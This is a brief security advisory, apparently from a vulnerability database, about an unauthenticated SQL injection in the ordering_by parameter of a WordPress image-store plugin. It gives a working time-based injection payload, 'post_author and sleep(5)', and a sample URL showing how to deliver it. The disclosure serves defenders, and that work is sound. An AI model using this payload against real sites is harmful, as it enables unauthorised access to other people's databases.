The plugin does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack
On a page where the [codepeople-image-store] is embed, append the following payload ordering_by=post_author+and+sleep(5)
e.g: https://example.com/?cpis_image=test&ordering_by=post_author+and+sleep(5)